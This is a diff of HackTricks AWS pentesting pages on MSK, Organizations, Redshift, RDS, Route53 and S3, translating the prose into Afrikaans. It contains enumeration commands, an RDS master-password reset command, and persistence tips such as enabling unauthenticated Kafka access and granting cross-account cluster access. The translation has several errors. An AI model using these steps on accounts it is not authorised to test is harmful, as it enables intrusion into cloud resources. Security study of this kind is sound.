-**Amazon Managed Streaming for Apache Kafka (Amazon MSK)** is a service that is fully managed, facilitating the development and execution of applications processing streaming data through **Apache Kafka**. Control-plane operations, including creation, update, and deletion of **clusters**, are offered by Amazon MSK. The service permits the utilization of Apache Kafka **data-plane operations**, encompassing data production and consumption. It operates on **open-source versions of Apache Kafka**, ensuring compatibility with existing applications, tooling, and plugins from both partners and the **Apache Kafka community**, eliminating the need for alterations in the application code.
+**Amazon Managed Streaming for Apache Kafka (Amazon MSK)** is 'n diens wat ten volle bestuur word, wat die ontwikkeling en uitvoering van toepassings wat stroomdata verwerk deur **Apache Kafka** fasiliteer. Beheer-vlak operasies, insluitend die skep, opdateer en verwyder van **clusters**, word deur Amazon MSK aangebied. Die diens laat die gebruik van Apache Kafka **data-vlak operasies** toe, wat data produksie en verbruik insluit. Dit werk op **oop-bron weergawes van Apache Kafka**, wat verseker dat dit versoenbaar is met bestaande toepassings, gereedskap en plugins van beide vennote en die **Apache Kafka-gemeenskap**, wat die behoefte aan veranderinge in die toepassingskode uitskakel.
 
-In terms of reliability, Amazon MSK is designed to **automatically detect and recover from prevalent cluster failure scenarios**, ensuring that producer and consumer applications persist in their data writing and reading activities with minimal disruption. Moreover, it aims to optimize data replication processes by attempting to **reuse the storage of replaced brokers**, thereby minimizing the volume of data that needs to be replicated by Apache Kafka.
+Wat betroubaarheid betref, is Amazon MSK ontwerp om **outomaties algemene cluster-faal scenario's te detecteer en te herstel**, wat verseker dat produsent- en verbruiker-toepassings voortgaan met hul data skryf- en leesaktiwiteite met minimale onderbreking. Boonop poog dit om data replikasie prosesse te optimaliseer deur te probeer om die **berging van vervangde brokers te hergebruik**, wat die volume van data wat deur Apache Kafka gerepliseer moet word, minimaliseer.
 
-### **Types**
+### **Tipes**
 
-There are 2 types of Kafka clusters that AWS allows to create: Provisioned and Serverless.
+Daar is 2 tipes Kafka-clusters wat AWS toelaat om te skep: Provisioned en Serverless.
 
-From the point of view of an attacker you need to know that:
+Van die oogpunt van 'n aanvaller moet jy weet dat:
 
-- **Serverless cannot be directly public** (it can only run in a VPN without any publicly exposed IP). However, **Provisioned** can be configured to get a **public IP** (by default it doesn't) and configure the **security group** to **expose** the relevant ports.
-- **Serverless** **only support IAM** as authentication method. **Provisioned** support SASL/SCRAM (**password**) authentication, **IAM** authentication, AWS **Certificate** Manager (ACM) authentication and **Unauthenticated** access.
-  - Note that it's not possible to expose publicly a Provisioned Kafka if unauthenticated access is enabled
+- **Serverless kan nie direk publiek wees nie** (dit kan slegs in 'n VPN loop sonder enige publiek blootgestelde IP). egter, **Provisioned** kan gekonfigureer word om 'n **publieke IP** te kry (standaard doen dit nie) en die **veiligheidsgroep** te konfigureer om die relevante poorte te **bloot te stel**.
+- **Serverless** **ondersteun slegs IAM** as autentikasie metode. **Provisioned** ondersteun SASL/SCRAM (**wagwoord**) autentikasie, **IAM** autentikasie, AWS **Certificate** Manager (ACM) autentikasie en **Onautentiseerde** toegang.
+- Let daarop dat dit nie moontlik is om 'n Provisioned Kafka publiek bloot te stel as onaudentiseerde toegang geaktiveer is nie.
 
 ### Enumeration
-
 ```bash
 #Get clusters
 aws kafka list-clusters
@@ -43,9 +42,7 @@ aws kafka describe-configuration-revision --arn <config-arn> --revision <version
 # If using SCRAN authentication, get used AWS secret name (not secret value)
 aws kafka list-scram-secrets --cluster-arn <cluster-arn>
 ```
-
-### Kafka IAM Access (in serverless)
-
+### Kafka IAM Toegang (in serverless)
 ```bash
 # Guide from https://docs.aws.amazon.com/msk/latest/developerguide/create-serverless-cluster.html
 # Download Kafka
@@ -75,7 +72,6 @@ kafka_2.12-2.8.1/bin/kafka-console-producer.sh --broker-list $BS --producer.conf
 # Read messages
 kafka_2.12-2.8.1/bin/kafka-console-consumer.sh --bootstrap-server $BS --consumer.config client.properties --topic msk-serverless-tutorial --from-beginning
 ```
-
 ### Privesc
 
 {{#ref}}
@@ -90,14 +86,10 @@ kafka_2.12-2.8.1/bin/kafka-console-consumer.sh --bootstrap-server $BS --consumer
 
 ### Persistence
 
-If you are going to **have access to the VPC** where a Provisioned Kafka is, you could **enable unauthorised access**, if **SASL/SCRAM authentication**, **read** the password from the secret, give some **other controlled user IAM permissions** (if IAM or serverless used) or persist with **certificates**.
+As jy **toegang tot die VPC** waar 'n Provisioned Kafka is, gaan hê, kan jy **ongemagtigde toegang** **aktiveer**, as **SASL/SCRAM-sertifisering**, **lees** die wagwoord uit die geheim, gee 'n paar **ander beheerde gebruiker IAM-toestemmings** (as IAM of serverless gebruik word) of volhard met **sertifikate**.
 
 ## References
 
 - [https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html](https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md
index df5a51a37..3b6c5a2de 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md
@@ -2,23 +2,22 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Baisc Information
+## Basiese Inligting
 
-AWS Organizations facilitates the creation of new AWS accounts without incurring additional costs. Resources can be allocated effortlessly, accounts can be efficiently grouped, and governance policies can be applied to individual accounts or groups, enhancing management and control within the organization.
+AWS Organizations fasiliteer die skep van nuwe AWS-rekeninge sonder om addisionele koste te incurr. Hulpbronne kan moeiteloos toegeken word, rekeninge kan doeltreffend gegroepeer word, en bestuursbeleide kan op individuele rekeninge of groepe toegepas word, wat bestuur en beheer binne die organisasie verbeter.
 
-Key Points:
+Belangrike Punten:
 
-- **New Account Creation**: AWS Organizations allows the creation of new AWS accounts without extra charges.
-- **Resource Allocation**: It simplifies the process of allocating resources across the accounts.
-- **Account Grouping**: Accounts can be grouped together, making management more streamlined.
-- **Governance Policies**: Policies can be applied to accounts or groups of accounts, ensuring compliance and governance across the organization.
+- **Nuwe Rekening Skep**: AWS Organizations laat die skep van nuwe AWS-rekeninge toe sonder ekstra koste.
+- **Hulpbron Toekenning**: Dit vereenvoudig die proses om hulpbronne oor die rekeninge toe te ken.
+- **Rekening Groepering**: Rekeninge kan saamgegroepeer word, wat bestuur meer gestroomlyn maak.
+- **Bestuursbeleide**: Beleide kan op rekeninge of groepe van rekeninge toegepas word, wat nakoming en bestuur oor die organisasie verseker.
 
-You can find more information in:
+Jy kan meer inligting vind in:
 
 {{#ref}}
 ../aws-basic-information/
 {{#endref}}
-
 ```bash
 # Get Org
 aws organizations describe-organization
@@ -39,13 +38,8 @@ aws organizations list-accounts-for-parent --parent-id ou-n8s9-8nzv3a5y
 ## You need the permission iam:GetAccountSummary
 aws iam get-account-summary
 ```
-
-## References
+## Verwysings
 
 - https://aws.amazon.com/organizations/
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md
index d5cb84f1d..9e4ee6b15 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md
@@ -1,28 +1,20 @@
-# AWS - Other Services Enum
+# AWS - Ander Dienste Enum
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## Directconnect
 
-Allows to **connect a corporate private network with AWS** (so you could compromise an EC2 instance and access the corporate network).
-
+Laat toe om **'n korporatiewe private netwerk met AWS te verbind** (sodat jy 'n EC2-instantie kan kompromitteer en toegang tot die korporatiewe netwerk kan verkry).
 ```
 aws directconnect describe-connections
 aws directconnect describe-interconnects
 aws directconnect describe-virtual-gateways
 aws directconnect describe-virtual-interfaces
 ```
+## Ondersteuning
 
-## Support
-
-In AWS you can access current and previous support cases via the API
-
+In AWS kan jy huidige en vorige ondersteuningsake via die API toegang verkry
 ```
 aws support describe-cases --include-resolved-cases
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md
index 7ae94d5d6..2922ecd0b 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md
@@ -4,46 +4,45 @@
 
 ## Amazon Redshift
 
-Redshift is a fully managed service that can scale up to over a petabyte in size, which is used as a **data warehouse for big data solutions**. Using Redshift clusters, you are able to run analytics against your datasets using fast, SQL-based query tools and business intelligence applications to gather greater understanding of vision for your business.
+Redshift is 'n volledig bestuurde diens wat kan skaal tot oor 'n petabyte in grootte, wat gebruik word as 'n **data warehouse vir groot data oplossings**. Met Redshift-klusters kan jy analises teen jou datastelle uitvoer met behulp van vinnige, SQL-gebaseerde vrae gereedskap en besigheidsintelligensie toepassings om 'n groter begrip van jou besigheid se visie te verkry.
 
-**Redshift offers encryption at rest using a four-tired hierarchy of encryption keys using either KMS or CloudHSM to manage the top tier of keys**. **When encryption is enabled for your cluster, it can't be disable and vice versa**. When you have an unencrypted cluster, it can't be encrypted.
+**Redshift bied versleuteling in rus aan met 'n vier-laag hiërargie van versleuteling sleutels wat KMS of CloudHSM gebruik om die boonste laag van sleutels te bestuur**. **Wanneer versleuteling geaktiveer is vir jou kluster, kan dit nie gedeaktiveer word nie en omgekeerd**. Wanneer jy 'n nie-versleutelde kluster het, kan dit nie versleuteld word nie.
 
-Encryption for your cluster can only happen during its creation, and once encrypted, the data, metadata, and any snapshots are also encrypted. The tiering level of encryption keys are as follows, **tier one is the master key, tier two is the cluster encryption key, the CEK, tier three, the database encryption key, the DEK, and finally tier four, the data encryption keys themselves**.
+Versleuteling vir jou kluster kan slegs tydens die skepping daarvan plaasvind, en sodra dit versleuteld is, is die data, metadata, en enige snappings ook versleuteld. Die laaggelaagdheid van versleuteling sleutels is soos volg, **laag een is die meester sleutel, laag twee is die kluster versleuteling sleutel, die CEK, laag drie, die databasis versleuteling sleutel, die DEK, en uiteindelik laag vier, die data versleuteling sleutels self**.
 
 ### KMS
 
-During the creation of your cluster, you can either select the **default KMS key** for Redshift or select your **own CMK**, which gives you more flexibility over the control of the key, specifically from an auditable perspective.
+Tydens die skepping van jou kluster, kan jy of die **standaard KMS sleutel** vir Redshift kies of jou **eie CMK** kies, wat jou meer buigsaamheid gee oor die beheer van die sleutel, spesifiek vanuit 'n auditeerbare perspektief.
 
-The default KMS key for Redshift is automatically created by Redshift the first time the key option is selected and used, and it is fully managed by AWS.
+Die standaard KMS sleutel vir Redshift word outomaties deur Redshift geskep die eerste keer dat die sleutelopsie gekies en gebruik word, en dit word volledig bestuur deur AWS.
 
-This KMS key is then encrypted with the CMK master key, tier one. This encrypted KMS data key is then used as the cluster encryption key, the CEK, tier two. This CEK is then sent by KMS to Redshift where it is stored separately from the cluster. Redshift then sends this encrypted CEK to the cluster over a secure channel where it is stored in memory.
+Hierdie KMS sleutel word dan versleuteld met die CMK meester sleutel, laag een. Hierdie versleutelde KMS data sleutel word dan gebruik as die kluster versleuteling sleutel, die CEK, laag twee. Hierdie CEK word dan deur KMS na Redshift gestuur waar dit apart van die kluster gestoor word. Redshift stuur dan hierdie versleutelde CEK na die kluster oor 'n veilige kanaal waar dit in geheue gestoor word.
 
-Redshift then requests KMS to decrypt the CEK, tier two. This decrypted CEK is then also stored in memory. Redshift then creates a random database encryption key, the DEK, tier three, and loads that into the memory of the cluster. The decrypted CEK in memory then encrypts the DEK, which is also stored in memory.
+Redshift vra dan KMS om die CEK, laag twee, te ontsleutel. Hierdie ontsleutelde CEK word dan ook in geheue gestoor. Redshift skep dan 'n ewekansige databasis versleuteling sleutel, die DEK, laag drie, en laai dit in die geheue van die kluster. Die ontsleutelde CEK in geheue versleutelt dan die DEK, wat ook in geheue gestoor word.
 
-This encrypted DEK is then sent over a secure channel and stored in Redshift separately from the cluster. Both the CEK and the DEK are now stored in memory of the cluster both in an encrypted and decrypted form. The decrypted DEK is then used to encrypt data keys, tier four, that are randomly generated by Redshift for each data block in the database.
+Hierdie versleutelde DEK word dan oor 'n veilige kanaal gestuur en apart in Redshift gestoor van die kluster. Beide die CEK en die DEK is nou in die geheue van die kluster gestoor, beide in 'n versleutelde en ontsleutelde vorm. Die ontsleutelde DEK word dan gebruik om datakeys, laag vier, te versleutelen wat ewekansig deur Redshift vir elke datablock in die databasis gegenereer word.
 
-You can use AWS Trusted Advisor to monitor the configuration of your Amazon S3 buckets and ensure that bucket logging is enabled, which can be useful for performing security audits and tracking usage patterns in S3.
+Jy kan AWS Trusted Advisor gebruik om die konfigurasie van jou Amazon S3-buckets te monitor en te verseker dat bucket logging geaktiveer is, wat nuttig kan wees vir die uitvoering van sekuriteitsoudites en die opsporing van gebruikspatrone in S3.
 
 ### CloudHSM
 
 <details>
 
-<summary>Using Redshift with CloudHSM</summary>
+<summary>Gebruik Redshift met CloudHSM</summary>
 
-When working with CloudHSM to perform your encryption, firstly you must set up a trusted connection between your HSM client and Redshift while using client and server certificates.
+Wanneer jy met CloudHSM werk om jou versleuteling uit te voer, moet jy eers 'n vertroude verbinding tussen jou HSM-klient en Redshift opstel terwyl jy kliënt- en bedienersertifikate gebruik.
 
-This connection is required to provide secure communications, allowing encryption keys to be sent between your HSM client and your Redshift clusters. Using a randomly generated private and public key pair, Redshift creates a public client certificate, which is encrypted and stored by Redshift. This must be downloaded and registered to your HSM client, and assigned to the correct HSM partition.
+Hierdie verbinding is nodig om veilige kommunikasie te bied, wat toelaat dat versleuteling sleutels tussen jou HSM-klient en jou Redshift-klusters gestuur kan word. Met 'n ewekansig gegenereerde private en publieke sleutel paar, skep Redshift 'n publieke kliëntsertifikaat, wat versleuteld en deur Redshift gestoor word. Dit moet afgelaai en geregistreer word by jou HSM-klient, en aan die regte HSM-partisie toegeken word.
 
-You must then configure Redshift with the following details of your HSM client: the HSM IP address, the HSM partition name, the HSM partition password, and the public HSM server certificate, which is encrypted by CloudHSM using an internal master key. Once this information has been provided, Redshift will confirm and verify that it can connect and access development partition.
+Jy moet dan Redshift konfigureer met die volgende besonderhede van jou HSM-klient: die HSM IP-adres, die HSM-partisie naam, die HSM-partisie wagwoord, en die publieke HSM bedienersertifikaat, wat deur CloudHSM met 'n interne meester sleutel versleuteld is. Sodra hierdie inligting verskaf is, sal Redshift bevestig en verifieer dat dit kan aansluit en toegang tot die ontwikkelingspartisie kan verkry.
 
-If your internal security policies or governance controls dictate that you must apply key rotation, then this is possible with Redshift enabling you to rotate encryption keys for encrypted clusters, however, you do need to be aware that during the key rotation process, it will make a cluster unavailable for a very short period of time, and so it's best to only rotate keys as and when you need to, or if you feel they may have been compromised.
+As jou interne sekuriteitsbeleide of bestuurbeheer bepaal dat jy sleutelrotasie moet toepas, dan is dit moontlik met Redshift wat jou in staat stel om versleuteling sleutels vir versleutelde klusters te roteer, maar jy moet bewus wees dat tydens die sleutelrotasie proses, dit 'n kluster vir 'n baie kort tydperk van tyd onbeskikbaar sal maak, en dit is dus die beste om sleutels slegs te roteer soos en wanneer jy moet, of as jy voel dat hulle moontlik gecompromitteer is.
 
-During the rotation, Redshift will rotate the CEK for your cluster and for any backups of that cluster. It will rotate a DEK for the cluster but it's not possible to rotate a DEK for the snapshots stored in S3 that have been encrypted using the DEK. It will put the cluster into a state of 'rotating keys' until the process is completed when the status will return to 'available'.
+Tydens die rotasie, sal Redshift die CEK vir jou kluster en vir enige rugsteun van daardie kluster roteer. Dit sal 'n DEK vir die kluster roteer, maar dit is nie moontlik om 'n DEK vir die snappings wat in S3 gestoor is en met die DEK versleuteld is, te roteer nie. Dit sal die kluster in 'n toestand van 'sleutels roteer' plaas totdat die proses voltooi is wanneer die status terugkeer na 'beskikbaar'.
 
 </details>
 
 ### Enumeration
-
 ```bash
 # Get clusters
 aws redshift describe-clusters
@@ -82,22 +81,17 @@ aws redshift describe-scheduled-actions
 # The redshift instance must be publicly available (not by default), the sg need to allow inbounds connections to the port and you need creds
 psql -h redshift-cluster-1.sdflju3jdfkfg.us-east-1.redshift.amazonaws.com -U admin -d dev -p 5439
 ```
-
 ## Privesc
 
 {{#ref}}
 ../aws-privilege-escalation/aws-redshift-privesc.md
 {{#endref}}
 
-## Persistence
+## Persistensie
 
-The following actions allow to grant access to other AWS accounts to the cluster:
+Die volgende aksies stel in staat om toegang tot ander AWS-rekeninge tot die kluster te verleen:
 
 - [authorize-endpoint-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-endpoint-access.html)
 - [authorize-snapshot-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-snapshot-access.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md
index 473369403..cbaa367b4 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md
@@ -2,76 +2,75 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Basiese Inligting
 
-The **Relational Database Service (RDS)** offered by AWS is designed to streamline the deployment, operation, and scaling of a **relational database in the cloud**. This service offers the advantages of cost efficiency and scalability while automating labor-intensive tasks like hardware provisioning, database configuration, patching, and backups.
+Die **Relational Database Service (RDS)** wat deur AWS aangebied word, is ontwerp om die ontplooiing, werking en skaal van 'n **relationele databasis in die wolk** te stroomlyn. Hierdie diens bied die voordele van kostedoeltreffendheid en skaalbaarheid terwyl dit arbeidsintensiewe take soos hardeware voorsiening, databasis konfigurasie, patching en rugsteun outomatiseer.
 
-AWS RDS supports various widely-used relational database engines including MySQL, PostgreSQL, MariaDB, Oracle Database, Microsoft SQL Server, and Amazon Aurora, with compatibility for both MySQL and PostgreSQL.
+AWS RDS ondersteun verskeie algemeen gebruikte relationele databasis enjin, insluitend MySQL, PostgreSQL, MariaDB, Oracle Database, Microsoft SQL Server, en Amazon Aurora, met kompatibiliteit vir beide MySQL en PostgreSQL.
 
-Key features of RDS include:
+Belangrike kenmerke van RDS sluit in:
 
-- **Management of database instances** is simplified.
-- Creation of **read replicas** to enhance read performance.
-- Configuration of **multi-Availability Zone (AZ) deployments** to ensure high availability and failover mechanisms.
-- **Integration** with other AWS services, such as:
-  - AWS Identity and Access Management (**IAM**) for robust access control.
-  - AWS **CloudWatch** for comprehensive monitoring and metrics.
-  - AWS Key Management Service (**KMS**) for ensuring encryption at rest.
+- **Bestuur van databasisinstansies** is vereenvoudig.
+- Skep van **lees replika** om leesprestasie te verbeter.
+- Konfigurasie van **multi-Beskikbaarheid Sone (AZ) ontplooiings** om hoë beskikbaarheid en failover meganismes te verseker.
+- **Integrasie** met ander AWS dienste, soos:
+- AWS Identiteit en Toegang Bestuur (**IAM**) vir robuuste toegangbeheer.
+- AWS **CloudWatch** vir omvattende monitering en metrieke.
+- AWS Sleutelbestuurdiens (**KMS**) om versleuteling in rus te verseker.
 
-## Credentials
+## Kredensiale
 
-When creating the DB cluster the master **username** can be configured (**`admin`** by default). To generate the password of this user you can:
+Wanneer die DB-kluster geskep word, kan die meester **gebruikersnaam** geconfigureer word (**`admin`** is die standaard). Om die wagwoord van hierdie gebruiker te genereer, kan jy:
 
-- **Indicate** a **password** yourself
-- Tell RDS to **auto generate** it
-- Tell RDS to manage it in **AWS Secret Manager** encrypted with a KMS key
+- **Aangee** 'n **wagwoord** self
+- RDS sê om dit **outomaties te genereer**
+- RDS sê om dit in **AWS Secret Manager** te bestuur wat met 'n KMS-sleutel versleuteld is
 
 <figure><img src="../../../images/image (144).png" alt=""><figcaption></figcaption></figure>
 
-### Authentication
+### Verifikasie
 
-There are 3 types of authentication options, but using the **master password is always allowed**:
+Daar is 3 tipes verifikasie opsies, maar die gebruik van die **meester wagwoord is altyd toegelaat**:
 
 <figure><img src="../../../images/image (227).png" alt=""><figcaption></figcaption></figure>
 
-### Public Access & VPC
+### Publieke Toegang & VPC
 
-By default **no public access is granted** to the databases, however it **could be granted**. Therefore, by default only machines from the same VPC will be able to access it if the selected **security group** (are stored in EC2 SG)allows it.
+Standaard **word geen publieke toegang toegestaan** tot die databasisse nie, maar dit **kan toegestaan word**. Daarom sal slegs masjiene van dieselfde VPC toegang hê as die geselekteerde **veiligheidsgroep** (wat in EC2 SG gestoor word) dit toelaat.
 
-Instead of exposing a DB instance, it’s possible to create a **RDS Proxy** which **improves** the **scalability** & **availability** of the DB cluster.
+In plaas daarvan om 'n DB-instansie bloot te stel, is dit moontlik om 'n **RDS Proxy** te skep wat die **skaalbaarheid** & **beskikbaarheid** van die DB-kluster **verbeter**.
 
-Moreover, the **database port can be modified** also.
+Boonop kan die **databasispoort ook gewysig word**.
 
-### Encryption
+### Versleuteling
 
-**Encryption is enabled by default** using a AWS managed key (a CMK could be chosen instead).
+**Versleuteling is standaard geaktiveer** met 'n AWS bestuurde sleutel (n CMK kan in plaas daarvan gekies word).
 
-By enabling your encryption, you are enabling **encryption at rest for your storage, snapshots, read replicas and your back-ups**. Keys to manage this encryption can be issued by using **KMS**.\
-It's not possible to add this level of encryption after your database has been created. **It has to be done during its creation**.
+Deur jou versleuteling te aktiveer, aktiveer jy **versleuteling in rus vir jou stoor, snapshots, lees replika en jou rugsteun**. Sleutels om hierdie versleuteling te bestuur kan uitgereik word deur **KMS**.\
+Dit is nie moontlik om hierdie vlak van versleuteling by te voeg nadat jou databasis geskep is nie. **Dit moet tydens die skepping gedoen word**.
 
-However, there is a **workaround allowing you to encrypt an unencrypted database as follows**. You can create a snapshot of your unencrypted database, create an encrypted copy of that snapshot, use that encrypted snapshot to create a new database, and then, finally, your database would then be encrypted.
+Daar is egter 'n **ompad wat jou toelaat om 'n nie-versleutelde databasis soos volg te versleutel**. Jy kan 'n snapshot van jou nie-versleutelde databasis skep, 'n versleutelde kopie van daardie snapshot skep, daardie versleutelde snapshot gebruik om 'n nuwe databasis te skep, en dan, uiteindelik, sou jou databasis dan versleuteld wees.
 
-#### Transparent Data Encryption (TDE)
+#### Deursigtige Data Versleuteling (TDE)
 
-Alongside the encryption capabilities inherent to RDS at the application level, RDS also supports **additional platform-level encryption mechanisms** to safeguard data at rest. This includes **Transparent Data Encryption (TDE)** for Oracle and SQL Server. However, it's crucial to note that while TDE enhances security by encrypting data at rest, it may also **affect database performance**. This performance impact is especially noticeable when used in conjunction with MySQL cryptographic functions or Microsoft Transact-SQL cryptographic functions.
+Saam met die versleuteling vermoëns wat inherent aan RDS op die toepassingsvlak is, ondersteun RDS ook **addisionele platform-vlak versleuteling meganismes** om data in rus te beskerm. Dit sluit **Deursigtige Data Versleuteling (TDE)** vir Oracle en SQL Server in. Dit is egter belangrik om op te let dat terwyl TDE sekuriteit verbeter deur data in rus te versleutel, dit ook **databasisprestasie kan beïnvloed**. Hierdie prestasie-impak is veral merkbaar wanneer dit saam met MySQL-kryptografiese funksies of Microsoft Transact-SQL-kryptografiese funksies gebruik word.
 
-To utilize TDE, certain preliminary steps are required:
+Om TDE te gebruik, is sekere voorlopige stappe nodig:
 
-1. **Option Group Association**:
-   - The database must be associated with an option group. Option groups serve as containers for settings and features, facilitating database management, including security enhancements.
-   - However, it's important to note that option groups are only available for specific database engines and versions.
-2. **Inclusion of TDE in Option Group**:
-   - Once associated with an option group, the Oracle Transparent Data Encryption option needs to be included in that group.
-   - It's essential to recognize that once the TDE option is added to an option group, it becomes a permanent fixture and cannot be removed.
-3. **TDE Encryption Modes**:
-   - TDE offers two distinct encryption modes:
-     - **TDE Tablespace Encryption**: This mode encrypts entire tables, providing a broader scope of data protection.
-     - **TDE Column Encryption**: This mode focuses on encrypting specific, individual elements within the database, allowing for more granular control over what data is encrypted.
+1. **Opsie Groep Assosiasie**:
+- Die databasis moet met 'n opsiegroep geassosieer word. Opsiegroepe dien as houers vir instellings en kenmerke, wat databasisbestuur vergemaklik, insluitend sekuriteitsverbeterings.
+- Dit is egter belangrik om op te let dat opsiegroepe slegs beskikbaar is vir spesifieke databasis enjin en weergawes.
+2. **Insluiting van TDE in Opsiegroep**:
+- Sodra dit met 'n opsiegroep geassosieer is, moet die Oracle Deursigtige Data Versleuteling opsie in daardie groep ingesluit word.
+- Dit is noodsaaklik om te erken dat sodra die TDE opsie by 'n opsiegroep gevoeg word, dit 'n permanente kenmerk word en nie verwyder kan word nie.
+3. **TDE Versleuteling Modusse**:
+- TDE bied twee uiteenlopende versleuteling modusse:
+- **TDE Tabelruimte Versleuteling**: Hierdie modus versleutel hele tabelles, wat 'n breër omvang van databeskydding bied.
+- **TDE Kolom Versleuteling**: Hierdie modus fokus op die versleuteling van spesifieke, individuele elemente binne die databasis, wat meer granulaire beheer oor wat data versleutel, moontlik maak.
 
-Understanding these prerequisites and the operational intricacies of TDE is crucial for effectively implementing and managing encryption within RDS, ensuring both data security and compliance with necessary standards.
-
-### Enumeration
+Om hierdie vereistes en die operasionele ingewikkeldhede van TDE te verstaan, is noodsaaklik vir effektiewe implementering en bestuur van versleuteling binne RDS, wat beide datasekuriteit en nakoming van nodige standaarde verseker.
 
+### Enumerasie
 ```bash
 # Clusters info
 ## Get Endpoints, username, port, iam auth enabled, attached roles, SG
@@ -106,41 +105,36 @@ aws rds describe-db-proxy-targets
 ## reset credentials of MasterUsername
 aws rds modify-db-instance --db-instance-identifier <ID> --master-user-password <NewPassword> --apply-immediately
 ```
-
-### Unauthenticated Access
+### Ongeauthentiseerde Toegang
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md
 {{#endref}}
 
-### Privesc
+### Privilege Escalation
 
 {{#ref}}
 ../aws-privilege-escalation/aws-rds-privesc.md
 {{#endref}}
 
-### Post Exploitation
+### Post Exploitatie
 
 {{#ref}}
 ../aws-post-exploitation/aws-rds-post-exploitation.md
 {{#endref}}
 
-### Persistence
+### Volharding
 
 {{#ref}}
 ../aws-persistence/aws-rds-persistence.md
 {{#endref}}
 
-### SQL Injection
+### SQL Inbraak
 
-There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**.
+Daar is maniere om toegang tot DynamoDB-data te verkry met **SQL-sintaksis**, daarom is tipiese **SQL-inbrake ook moontlik**.
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/sql-injection
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md
index c37002eb7..020cac016 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md
@@ -4,16 +4,15 @@
 
 ## Route 53
 
-Amazon Route 53 is a cloud **Domain Name System (DNS)** web service.\
-You can create https, http and tcp **health checks for web pages** via Route53.
+Amazon Route 53 is 'n wolk **Domain Name System (DNS)** webdiens.\
+Jy kan https, http en tcp **gesondheidskontroles vir webbladsye** via Route53 skep.
 
-### IP-based routing <a href="#routing-policy-ipbased" id="routing-policy-ipbased"></a>
+### IP-gebaseerde roetering <a href="#routing-policy-ipbased" id="routing-policy-ipbased"></a>
 
-This is useful to tune your DNS routing to make the best DNS routing decisions for your end users.\
-IP-based routing offers you the additional ability to **optimize routing based on specific knowledge of your customer base**.
-
-### Enumeration
+Dit is nuttig om jou DNS-roetering aan te pas om die beste DNS-roeteringsbesluite vir jou eindgebruikers te neem.\
+IP-gebaseerde roetering bied jou die addisionele vermoë om **roetering te optimaliseer op grond van spesifieke kennis van jou kliëntebasis**.
 
+### Enumerasie
 ```bash
 aws route53 list-hosted-zones # Get domains
 aws route53 get-hosted-zone --id <hosted_zone_id>
@@ -21,7 +20,6 @@ aws route53 list-resource-record-sets --hosted-zone-id <hosted_zone_id> # Get al
 aws route53 list-health-checks
 aws route53 list-traffic-policies
 ```
-
 ### Privesc
 
 {{#ref}}
@@ -29,7 +27,3 @@ aws route53 list-traffic-policies
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md
index 3133c0eac..5caeedfaa 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md
@@ -4,144 +4,137 @@
 
 ## S3
 
-Amazon S3 is a service that allows you **store big amounts of data**.
+Amazon S3 is 'n diens wat jou toelaat om **groot hoeveelhede data te stoor**.
 
-Amazon S3 provides multiple options to achieve the **protection** of data at REST. The options include **Permission** (Policy), **Encryption** (Client and Server Side), **Bucket Versioning** and **MFA** **based delete**. The **user can enable** any of these options to achieve data protection. **Data replication** is an internal facility by AWS where **S3 automatically replicates each object across all the Availability Zones** and the organization need not enable it in this case.
+Amazon S3 bied verskeie opsies om die **beskerming** van data in rus te bereik. Die opsies sluit **Toestemming** (Beleid), **Enkripsie** (Kliënt en Bediener-kant), **Emmerweergawe** en **MFA** **gebaseerde verwydering** in. Die **gebruiker kan enige van hierdie opsies aktiveer** om databesking te bereik. **Data-replikaasie** is 'n interne fasiliteit deur AWS waar **S3 outomaties elke objek oor al die Beschikbaarheidsone repliseer** en die organisasie hoef dit nie in hierdie geval te aktiveer nie.
 
-With resource-based permissions, you can define permissions for sub-directories of your bucket separately.
